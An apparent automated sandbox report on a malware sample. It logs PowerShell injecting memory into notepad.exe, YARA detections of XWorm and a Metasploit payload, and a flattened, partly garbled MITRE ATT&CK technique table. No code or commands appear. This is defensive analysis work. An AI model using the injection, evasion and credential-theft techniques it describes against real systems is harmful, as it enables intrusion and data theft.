              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301D9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301DFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 288574301F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected XWorm
              Source: Yara matchFile source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 384, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected MetasploitPayload
              Source: Yara matchFile source: amsi64_6688.amsi.csv, type: OTHER
              Yara detected XWorm
              Source: Yara matchFile source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 384, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              PowerShell              		1
              DLL Side-Loading              		411
              Process Injection              		1
              Masquerading              		1
              Input Capture              		1
              Process Discovery              		Remote Services1
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory31
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol11
              Archive Collected Data              		1
              Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Application Window Discovery              		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
              Process Injection              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets13
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
